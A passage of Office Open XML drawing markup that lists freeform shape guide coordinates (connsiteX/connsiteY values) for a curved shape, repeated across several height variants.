              <a:gd name="connsiteY54" fmla="*/ 161973 h 1613814"/>
              <a:gd name="connsiteX55" fmla="*/ 8826766 w 9288370"/>
              <a:gd name="connsiteY55" fmla="*/ 152111 h 1613814"/>
              <a:gd name="connsiteX56" fmla="*/ 8917647 w 9288370"/>
              <a:gd name="connsiteY56" fmla="*/ 112232 h 1613814"/>
              <a:gd name="connsiteX57" fmla="*/ 9098594 w 9288370"/>
              <a:gd name="connsiteY57" fmla="*/ 73185 h 1613814"/>
              <a:gd name="connsiteX58" fmla="*/ 9232990 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 24074 h 1613814"/>
              <a:gd name="connsiteX59" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY59" fmla="*/ 0 h 1613814"/>
              <a:gd name="connsiteX60" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY60" fmla="*/ 0 h 1613814"/>
              <a:gd name="connsiteX61" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY61" fmla="*/ 1586048 h 1613814"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 1475444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032523 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1513858 h 1613814"/>
              <a:gd name="connsiteX6" fmla="*/ 1144951 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1528631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53639 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1396542 h 1613814"/>
              <a:gd name="connsiteX13" fmla="*/ 2623862 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1365980 h 1613814"/>
              <a:gd name="connsiteX14" fmla="*/ 2707413 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1359160 h 1613814"/>
              <a:gd name="connsiteX15" fmla="*/ 2843134 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1323561 h 1613814"/>
              <a:gd name="connsiteX16" fmla="*/ 2923804 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1314224 h 1613814"/>
              <a:gd name="connsiteX17" fmla="*/ 2953618 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1318186 h 1613814"/>
              <a:gd name="connsiteX18" fmla="*/ 2995816 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1318670 h 1613814"/>
              <a:gd name="connsiteX19" fmla="*/ 3352700 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1264183 h 1613814"/>
              <a:gd name="connsiteX20" fmla="*/ 3444611 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1236739 h 1613814"/>
              <a:gd name="connsiteX21" fmla="*/ 3650072 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 1217421 h 1613814"/>
              <a:gd name="connsiteX22" fmla="*/ 3707853 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 1241722 h 1613814"/>
              <a:gd name="connsiteX23" fmla="*/ 3925616 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 1253751 h 1613814"/>
              <a:gd name="connsiteX24" fmla="*/ 3954387 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 1263789 h 1613814"/>
              <a:gd name="connsiteX25" fmla="*/ 3995849 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 1272939 h 1613814"/>
              <a:gd name="connsiteX26" fmla="*/ 4067546 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 1294697 h 1613814"/>
              <a:gd name="connsiteX27" fmla="*/ 4190310 w 9288370"/>
              <a:gd name="connsiteY27" fmla="*/ 1307786 h 1613814"/>
              <a:gd name="connsiteX28" fmla="*/ 4230008 w 9288370"/>
              <a:gd name="connsiteY28" fmla="*/ 1303546 h 1613814"/>
              <a:gd name="connsiteX29" fmla="*/ 4575478 w 9288370"/>
              <a:gd name="connsiteY29" fmla="*/ 1261726 h 1613814"/>
              <a:gd name="connsiteX30" fmla="*/ 4650026 w 9288370"/>
              <a:gd name="connsiteY30" fmla="*/ 1265798 h 1613814"/>
              <a:gd name="connsiteX31" fmla="*/ 4792008 w 9288370"/>
              <a:gd name="connsiteY31" fmla="*/ 1243899 h 1613814"/>
              <a:gd name="connsiteX32" fmla="*/ 4954126 w 9288370"/>
              <a:gd name="connsiteY32" fmla="*/ 1204617 h 1613814"/>
              <a:gd name="connsiteX33" fmla="*/ 5309678 w 9288370"/>
              <a:gd name="connsiteY33" fmla="*/ 1128278 h 1613814"/>
              <a:gd name="connsiteX34" fmla="*/ 5474724 w 9288370"/>
              <a:gd name="connsiteY34" fmla="*/ 1091167 h 1613814"/>
              <a:gd name="connsiteX35" fmla="*/ 5612132 w 9288370"/>
              <a:gd name="connsiteY35" fmla="*/ 1051509 h 1613814"/>
              <a:gd name="connsiteX36" fmla="*/ 5776618 w 9288370"/>
              <a:gd name="connsiteY36" fmla="*/ 1053037 h 1613814"/>
              <a:gd name="connsiteX37" fmla="*/ 5785786 w 9288370"/>
              <a:gd name="connsiteY37" fmla="*/ 1051213 h 1613814"/>
              <a:gd name="connsiteX38" fmla="*/ 5829381 w 9288370"/>
              <a:gd name="connsiteY38" fmla="*/ 1046878 h 1613814"/>
              <a:gd name="connsiteX39" fmla="*/ 5943596 w 9288370"/>
              <a:gd name="connsiteY39" fmla="*/ 1043237 h 1613814"/>
              <a:gd name="connsiteX40" fmla="*/ 5985730 w 9288370"/>
              <a:gd name="connsiteY40" fmla="*/ 1035396 h 1613814"/>
              <a:gd name="connsiteX41" fmla="*/ 6103109 w 9288370"/>
              <a:gd name="connsiteY41" fmla="*/ 1019019 h 1613814"/>
              <a:gd name="connsiteX42" fmla="*/ 6222406 w 9288370"/>
              <a:gd name="connsiteY42" fmla="*/ 985341 h 1613814"/>
              <a:gd name="connsiteX43" fmla="*/ 6598672 w 9288370"/>
              <a:gd name="connsiteY43" fmla="*/ 902062 h 1613814"/>
              <a:gd name="connsiteX44" fmla="*/ 6766149 w 9288370"/>
              <a:gd name="connsiteY44" fmla="*/ 846132 h 1613814"/>
              <a:gd name="connsiteX45" fmla="*/ 6886312 w 9288370"/>
              <a:gd name="connsiteY45" fmla="*/ 781877 h 1613814"/>
              <a:gd name="connsiteX46" fmla="*/ 7006457 w 9288370"/>
              <a:gd name="connsiteY46" fmla="*/ 699758 h 1613814"/>
              <a:gd name="connsiteX47" fmla="*/ 7231643 w 9288370"/>
              <a:gd name="connsiteY47" fmla="*/ 640778 h 1613814"/>
              <a:gd name="connsiteX48" fmla="*/ 7363123 w 9288370"/>
              <a:gd name="connsiteY48" fmla="*/ 593682 h 1613814"/>
              <a:gd name="connsiteX49" fmla="*/ 7588368 w 9288370"/>
              <a:gd name="connsiteY49" fmla="*/ 531129 h 1613814"/>
              <a:gd name="connsiteX50" fmla="*/ 7782741 w 9288370"/>
              <a:gd name="connsiteY50" fmla="*/ 455936 h 1613814"/>
              <a:gd name="connsiteX51" fmla="*/ 7952094 w 9288370"/>
              <a:gd name="connsiteY51" fmla="*/ 409302 h 1613814"/>
              <a:gd name="connsiteX52" fmla="*/ 8275980 w 9288370"/>
              <a:gd name="connsiteY52" fmla="*/ 267262 h 1613814"/>
              <a:gd name="connsiteX53" fmla="*/ 8428864 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 208471 h 1613814"/>
              <a:gd name="connsiteX54" fmla="*/ 8616510 w 9288370"/>
              <a:gd name="connsiteY54" fmla="*/ 161973 h 1613814"/>
              <a:gd name="connsiteX55" fmla="*/ 8826766 w 9288370"/>
              <a:gd name="connsiteY55" fmla="*/ 152111 h 1613814"/>
              <a:gd name="connsiteX56" fmla="*/ 8917647 w 9288370"/>
              <a:gd name="connsiteY56" fmla="*/ 112232 h 1613814"/>
              <a:gd name="connsiteX57" fmla="*/ 9098594 w 9288370"/>
              <a:gd name="connsiteY57" fmla="*/ 73185 h 1613814"/>
              <a:gd name="connsiteX58" fmla="*/ 9232990 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 24074 h 1613814"/>
              <a:gd name="connsiteX59" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY59" fmla="*/ 0 h 1613814"/>
              <a:gd name="connsiteX60" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY60" fmla="*/ 0 h 1613814"/>
              <a:gd name="connsiteX61" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY61" fmla="*/ 1475444 h 1613814"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 1475444 h 1591693"/>
              <a:gd name="connsiteX1" fmla="*/ 134113 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1591693 h 1591693"/>
              <a:gd name="connsiteX2" fmla="*/ 374830 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1574915 h 1591693"/>
              <a:gd name="connsiteX3" fmla="*/ 611906 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1537813 h 1591693"/>
              <a:gd name="connsiteX4" fmla="*/ 940788 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1506488 h 1591693"/>
              <a:gd name="connsiteX5" fmla="*/ 1032523 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1513858 h 1591693"/>
              <a:gd name="connsiteX6" fmla="*/ 1144951 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1528631 h 1591693"/>
              <a:gd name="connsiteX7" fmla="*/ 1408773 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1503055 h 1591693"/>
              <a:gd name="connsiteX8" fmla="*/ 1679869 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1477584 h 1591693"/>
              <a:gd name="connsiteX9" fmla="*/ 1704699 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1453746 h 1591693"/>
              <a:gd name="connsiteX10" fmla="*/ 1794234 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1452327 h 1591693"/>
              <a:gd name="connsiteX11" fmla="*/ 2101780 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1409907 h 1591693"/>
              <a:gd name="connsiteX12" fmla="*/ 2253639 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1396542 h 1591693"/>
              <a:gd name="connsiteX13" fmla="*/ 2623862 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1365980 h 1591693"/>
              <a:gd name="connsiteX14" fmla="*/ 2707413 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1359160 h 1591693"/>
              <a:gd name="connsiteX15" fmla="*/ 2843134 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1323561 h 1591693"/>
              <a:gd name="connsiteX16" fmla="*/ 2923804 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1314224 h 1591693"/>
              <a:gd name="connsiteX17" fmla="*/ 2953618 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1318186 h 1591693"/>
              <a:gd name="connsiteX18" fmla="*/ 2995816 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1318670 h 1591693"/>
              <a:gd name="connsiteX19" fmla="*/ 3352700 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1264183 h 1591693"/>
              <a:gd name="connsiteX20" fmla="*/ 3444611 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1236739 h 1591693"/>
              <a:gd name="connsiteX21" fmla="*/ 3650072 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 1217421 h 1591693"/>
              <a:gd name="connsiteX22" fmla="*/ 3707853 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 1241722 h 1591693"/>
              <a:gd name="connsiteX23" fmla="*/ 3925616 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 1253751 h 1591693"/>
              <a:gd name="connsiteX24" fmla="*/ 3954387 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 1263789 h 1591693"/>
              <a:gd name="connsiteX25" fmla="*/ 3995849 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 1272939 h 1591693"/>
              <a:gd name="connsiteX26" fmla="*/ 4067546 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 1294697 h 1591693"/>
              <a:gd name="connsiteX27" fmla="*/ 4190310 w 9288370"/>
              <a:gd name="connsiteY27" fmla="*/ 1307786 h 1591693"/>
              <a:gd name="connsiteX28" fmla="*/ 4230008 w 9288370"/>
              <a:gd name="connsiteY28" fmla="*/ 1303546 h 1591693"/>
              <a:gd name="connsiteX29" fmla="*/ 4575478 w 9288370"/>
              <a:gd name="connsiteY29" fmla="*/ 1261726 h 1591693"/>
              <a:gd name="connsiteX30" fmla="*/ 4650026 w 9288370"/>
              <a:gd name="connsiteY30" fmla="*/ 1265798 h 1591693"/>
              <a:gd name="connsiteX31" fmla="*/ 4792008 w 9288370"/>
              <a:gd name="connsiteY31" fmla="*/ 1243899 h 1591693"/>
              <a:gd name="connsiteX32" fmla="*/ 4954126 w 9288370"/>
              <a:gd name="connsiteY32" fmla="*/ 1204617 h 1591693"/>
              <a:gd name="connsiteX33" fmla="*/ 5309678 w 9288370"/>
              <a:gd name="connsiteY33" fmla="*/ 1128278 h 1591693"/>
              <a:gd name="connsiteX34" fmla="*/ 5474724 w 9288370"/>
              <a:gd name="connsiteY34" fmla="*/ 1091167 h 1591693"/>
              <a:gd name="connsiteX35" fmla="*/ 5612132 w 9288370"/>
              <a:gd name="connsiteY35" fmla="*/ 1051509 h 1591693"/>
              <a:gd name="connsiteX36" fmla="*/ 5776618 w 9288370"/>
              <a:gd name="connsiteY36" fmla="*/ 1053037 h 1591693"/>
              <a:gd name="connsiteX37" fmla="*/ 5785786 w 9288370"/>
              <a:gd name="connsiteY37" fmla="*/ 1051213 h 1591693"/>
              <a:gd name="connsiteX38" fmla="*/ 5829381 w 9288370"/>
              <a:gd name="connsiteY38" fmla="*/ 1046878 h 1591693"/>
              <a:gd name="connsiteX39" fmla="*/ 5943596 w 9288370"/>
              <a:gd name="connsiteY39" fmla="*/ 1043237 h 1591693"/>
              <a:gd name="connsiteX40" fmla="*/ 5985730 w 9288370"/>
              <a:gd name="connsiteY40" fmla="*/ 1035396 h 1591693"/>
              <a:gd name="connsiteX41" fmla="*/ 6103109 w 9288370"/>
              <a:gd name="connsiteY41" fmla="*/ 1019019 h 1591693"/>
              <a:gd name="connsiteX42" fmla="*/ 6222406 w 9288370"/>
              <a:gd name="connsiteY42" fmla="*/ 985341 h 1591693"/>
              <a:gd name="connsiteX43" fmla="*/ 6598672 w 9288370"/>
              <a:gd name="connsiteY43" fmla="*/ 902062 h 1591693"/>
              <a:gd name="connsiteX44" fmla="*/ 6766149 w 9288370"/>
              <a:gd name="connsiteY44" fmla="*/ 846132 h 1591693"/>
              <a:gd name="connsiteX45" fmla="*/ 6886312 w 9288370"/>
              <a:gd name="connsiteY45" fmla="*/ 781877 h 1591693"/>
              <a:gd name="connsiteX46" fmla="*/ 7006457 w 9288370"/>
              <a:gd name="connsiteY46" fmla="*/ 699758 h 1591693"/>
              <a:gd name="connsiteX47" fmla="*/ 7231643 w 9288370"/>
              <a:gd name="connsiteY47" fmla="*/ 640778 h 1591693"/>
              <a:gd name="connsiteX48" fmla="*/ 7363123 w 9288370"/>
              <a:gd name="connsiteY48" fmla="*/ 593682 h 1591693"/>
              <a:gd name="connsiteX49" fmla="*/ 7588368 w 9288370"/>
              <a:gd name="connsiteY49" fmla="*/ 531129 h 1591693"/>
              <a:gd name="connsiteX50" fmla="*/ 7782741 w 9288370"/>
              <a:gd name="connsiteY50" fmla="*/ 455936 h 1591693"/>
              <a:gd name="connsiteX51" fmla="*/ 7952094 w 9288370"/>
              <a:gd name="connsiteY51" fmla="*/ 409302 h 1591693"/>
              <a:gd name="connsiteX52" fmla="*/ 8275980 w 9288370"/>
              <a:gd name="connsiteY52" fmla="*/ 267262 h 1591693"/>
              <a:gd name="connsiteX53" fmla="*/ 8428864 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 208471 h 1591693"/>
              <a:gd name="connsiteX54" fmla="*/ 8616510 w 9288370"/>
              <a:gd name="connsiteY54" fmla="*/ 161973 h 1591693"/>
              <a:gd name="connsiteX55" fmla="*/ 8826766 w 9288370"/>
              <a:gd name="connsiteY55" fmla="*/ 152111 h 1591693"/>
              <a:gd name="connsiteX56" fmla="*/ 8917647 w 9288370"/>
              <a:gd name="connsiteY56" fmla="*/ 112232 h 1591693"/>
              <a:gd name="connsiteX57" fmla="*/ 9098594 w 9288370"/>
              <a:gd name="connsiteY57" fmla="*/ 73185 h 1591693"/>
              <a:gd name="connsiteX58" fmla="*/ 9232990 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 24074 h 1591693"/>
              <a:gd name="connsiteX59" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY59" fmla="*/ 0 h 1591693"/>
              <a:gd name="connsiteX60" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY60" fmla="*/ 0 h 1591693"/>
              <a:gd name="connsiteX61" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY61" fmla="*/ 1475444 h 1591693"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 1475444 h 1582937"/>
              <a:gd name="connsiteX1" fmla="*/ 85420 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1525330 h 1582937"/>
              <a:gd name="connsiteX2" fmla="*/ 374830 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1574915 h 1582937"/>
              <a:gd name="connsiteX3" fmla="*/ 611906 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1537813 h 1582937"/>
              <a:gd name="connsiteX4" fmla="*/ 940788 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1506488 h 1582937"/>
              <a:gd name="connsiteX5" fmla="*/ 1032523 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1513858 h 1582937"/>
              <a:gd name="connsiteX6" fmla="*/ 1144951 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1528631 h 1582937"/>
              <a:gd name="connsiteX7" fmla="*/ 1408773 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1503055 h 1582937"/>
              <a:gd name="connsiteX8" fmla="*/ 1679869 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1477584 h 1582937"/>
              <a:gd name="connsiteX9" fmla="*/ 1704699 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1453746 h 1582937"/>
              <a:gd name="connsiteX10" fmla="*/ 1794234 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1452327 h 1582937"/>
              <a:gd name="connsiteX11" fmla="*/ 2101780 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1409907 h 1582937"/>
              <a:gd name="connsiteX12" fmla="*/ 2253639 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1396542 h 1582937"/>
              <a:gd name="connsiteX13" fmla="*/ 2623862 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1365980 h 1582937"/>
              <a:gd name="connsiteX14" fmla="*/ 2707413 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1359160 h 1582937"/>
              <a:gd name="connsiteX15" fmla="*/ 2843134 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1323561 h 1582937"/>
              <a:gd name="connsiteX16" fmla="*/ 2923804 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1314224 h 1582937"/>
              <a:gd name="connsiteX17" fmla="*/ 2953618 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1318186 h 1582937"/>
              <a:gd name="connsiteX18" fmla="*/ 2995816 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1318670 h 1582937"/>
              <a:gd name="connsiteX19" fmla="*/ 3352700 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1264183 h 1582937"/>
              <a:gd name="connsiteX20" fmla="*/ 3444611 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1236739 h 1582937"/>
              <a:gd name="connsiteX21" fmla="*/ 3650072 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 1217421 h 1582937"/>
              <a:gd name="connsiteX22" fmla="*/ 3707853 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 1241722 h 1582937"/>
              <a:gd name="connsiteX23" fmla="*/ 3925616 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 1253751 h 1582937"/>
              <a:gd name="connsiteX24" fmla="*/ 3954387 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 1263789 h 1582937"/>
              <a:gd name="connsiteX25" fmla="*/ 3995849 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 1272939 h 1582937"/>
              <a:gd name="connsiteX26" fmla="*/ 4067546 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 1294697 h 1582937"/>
              <a:gd name="connsiteX27" fmla="*/ 4190310 w 9288370"/>
              <a:gd name="connsiteY27" fmla="*/ 1307786 h 1582937"/>
              <a:gd name="connsiteX28" fmla="*/ 4230008 w 9288370"/>
              <a:gd name="connsiteY28" fmla="*/ 1303546 h 1582937"/>
              <a:gd name="connsiteX29" fmla="*/ 4575478 w 9288370"/>
              <a:gd name="connsiteY29" fmla="*/ 1261726 h 1582937"/>
              <a:gd name="connsiteX30" fmla="*/ 4650026 w 9288370"/>
              <a:gd name="connsiteY30" fmla="*/ 1265798 h 1582937"/>
              <a:gd name="connsiteX31" fmla="*/ 4792008 w 9288370"/>
              <a:gd name="connsiteY31" fmla="*/ 1243899 h 1582937"/>
              <a:gd name="connsiteX32" fmla="*/ 4954126 w 9288370"/>
              <a:gd name="connsiteY32" fmla="*/ 1204617 h 1582937"/>
              <a:gd name="connsiteX33" fmla="*/ 5309678 w 9288370"/>
              <a:gd name="connsiteY33" fmla="*/ 1128278 h 1582937"/>
              <a:gd name="connsiteX34" fmla="*/ 5474724 w 9288370"/>
              <a:gd name="connsiteY34" fmla="*/ 1091167 h 1582937"/>
              <a:gd name="connsiteX35" fmla="*/ 5612132 w 9288370"/>
              <a:gd name="connsiteY35" fmla="*/ 1051509 h 1582937"/>
              <a:gd name="connsiteX36" fmla="*/ 5776618 w 9288370"/>
              <a:gd name="connsiteY36" fmla="*/ 1053037 h 1582937"/>
              <a:gd name="connsiteX37" fmla="*/ 5785786 w 9288370"/>
              <a:gd name="connsiteY37" fmla="*/ 1051213 h 1582937"/>
              <a:gd name="connsiteX38" fmla="*/ 5829381 w 9288370"/>
              <a:gd name="connsiteY38" fmla="*/ 1046878 h 1582937"/>
              <a:gd name="connsiteX39" fmla="*/ 5943596 w 9288370"/>
              <a:gd name="connsiteY39" fmla="*/ 1043237 h 1582937"/>
              <a:gd name="connsiteX40" fmla="*/ 5985730 w 9288370"/>
              <a:gd name="connsiteY40" fmla="*/ 1035396 h 1582937"/>
              <a:gd name="connsiteX41" fmla="*/ 6103109 w 9288370"/>
              <a:gd name="connsiteY41" fmla="*/ 1019019 h 1582937"/>
              <a:gd name="connsiteX42" fmla="*/ 6222406 w 9288370"/>
              <a:gd name="connsiteY42" fmla="*/ 985341 h 1582937"/>
              <a:gd name="connsiteX43" fmla="*/ 6598672 w 9288370"/>
              <a:gd name="connsiteY43" fmla="*/ 902062 h 1582937"/>
              <a:gd name="connsiteX44" fmla="*/ 6766149 w 9288370"/>
              <a:gd name="connsiteY44" fmla="*/ 846132 h 1582937"/>
              <a:gd name="connsiteX45" fmla="*/ 6886312 w 9288370"/>
              <a:gd name="connsiteY45" fmla="*/ 781877 h 1582937"/>
              <a:gd name="connsiteX46" fmla="*/ 7006457 w 9288370"/>
              <a:gd name="connsiteY46" fmla="*/ 699758 h 1582937"/>
              <a:gd name="connsiteX47" fmla="*/ 7231643 w 9288370"/>
              <a:gd name="connsiteY47" fmla="*/ 640778 h 1582937"/>
              <a:gd name="connsiteX48" fmla="*/ 7363123 w 9288370"/>
              <a:gd name="connsiteY48" fmla="*/ 593682 h 1582937"/>
              <a:gd name="connsiteX49" fmla="*/ 7588368 w 9288370"/>
              <a:gd name="connsiteY49" fmla="*/ 531129 h 1582937"/>
              <a:gd name="connsiteX50" fmla="*/ 7782741 w 9288370"/>
              <a:gd name="connsiteY50" fmla="*/ 455936 h 1582937"/>
              <a:gd name="connsiteX51" fmla="*/ 7952094 w 9288370"/>
              <a:gd name="connsiteY51" fmla="*/ 409302 h 1582937"/>
              <a:gd name="connsiteX52" fmla="*/ 8275980 w 9288370"/>
              <a:gd name="connsiteY52" fmla="*/ 267262 h 1582937"/>
              <a:gd name="connsiteX53" fmla="*/ 8428864 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 208471 h 1582937"/>
              <a:gd name="connsiteX54" fmla="*/ 8616510 w 9288370"/>
              <a:gd name="connsiteY54" fmla="*/ 161973 h 1582937"/>
              <a:gd name="connsiteX55" fmla="*/ 8826766 w 9288370"/>
              <a:gd name="connsiteY55" fmla="*/ 152111 h 1582937"/>
              <a:gd name="connsiteX56" fmla="*/ 8917647 w 9288370"/>
              <a:gd name="connsiteY56" fmla="*/ 112232 h 1582937"/>
              <a:gd name="connsiteX57" fmla="*/ 9098594 w 9288370"/>
              <a:gd name="connsiteY57" fmla="*/ 73185 h 1582937"/>
              <a:gd name="connsiteX58" fmla="*/ 9232990 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 24074 h 1582937"/>
              <a:gd name="connsiteX59" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY59" fmla="*/ 0 h 1582937"/>
              <a:gd name="connsiteX60" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY60" fmla="*/ 0 h 1582937"/>
              <a:gd name="connsiteX61" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY61" fmla="*/ 1475444 h 1582937"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 1475444 h 1552307"/>
              <a:gd name="connsiteX1" fmla="*/ 85420 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1525330 h 1552307"/>
              <a:gd name="connsiteX2" fmla="*/ 358599 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1541734 h 1552307"/>
              <a:gd name="connsiteX3" fmla="*/ 611906 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1537813 h 1552307"/>
              <a:gd name="connsiteX4" fmla="*/ 940788 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1506488 h 1552307"/>
              <a:gd name="connsiteX5" fmla="*/ 1032523 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1513858 h 1552307"/>
              <a:gd name="connsiteX6" fmla="*/ 1144951 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1528631 h 1552307"/>
              <a:gd name="connsiteX7" fmla="*/ 1408773 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1503055 h 1552307"/>
              <a:gd name="connsiteX8" fmla="*/ 1679869 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1477584 h 1552307"/>
              <a:gd name="connsiteX9" fmla="*/ 1704699 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1453746 h 1552307"/>
              <a:gd name="connsiteX10" fmla="*/ 1794234 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1452327 h 1552307"/>
              <a:gd name="connsiteX11" fmla="*/ 2101780 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1409907 h 1552307"/>
              <a:gd name="connsiteX12" fmla="*/ 2253639 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1396542 h 1552307"/>
              <a:gd name="connsiteX13" fmla="*/ 2623862 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1365980 h 1552307"/>
              <a:gd name="connsiteX14" fmla="*/ 2707413 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1359160 h 1552307"/>
              <a:gd name="connsiteX15" fmla="*/ 2843134 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1323561 h 1552307"/>
              <a:gd name="connsiteX16" fmla="*/ 2923804 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1314224 h 1552307"/>
              <a:gd name="connsiteX17" fmla="*/ 2953618 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1318186 h 1552307"/>
              <a:gd name="connsiteX18" fmla="*/ 2995816 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1318670 h 1552307"/>
              <a:gd name="connsiteX19" fmla="*/ 3352700 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1264183 h 1552307"/>
              <a:gd name="connsiteX20" fmla="*/ 3444611 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1236739 h 1552307"/>
              <a:gd name="connsiteX21" fmla="*/ 3650072 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 1217421 h 1552307"/>
              <a:gd name="connsiteX22" fmla="*/ 3707853 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 1241722 h 1552307"/>
              <a:gd name="connsiteX23" fmla="*/ 3925616 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 1253751 h 1552307"/>
              <a:gd name="connsiteX24" fmla="*/ 3954387 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 1263789 h 1552307"/>
              <a:gd name="connsiteX25" fmla="*/ 3995849 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 1272939 h 1552307"/>
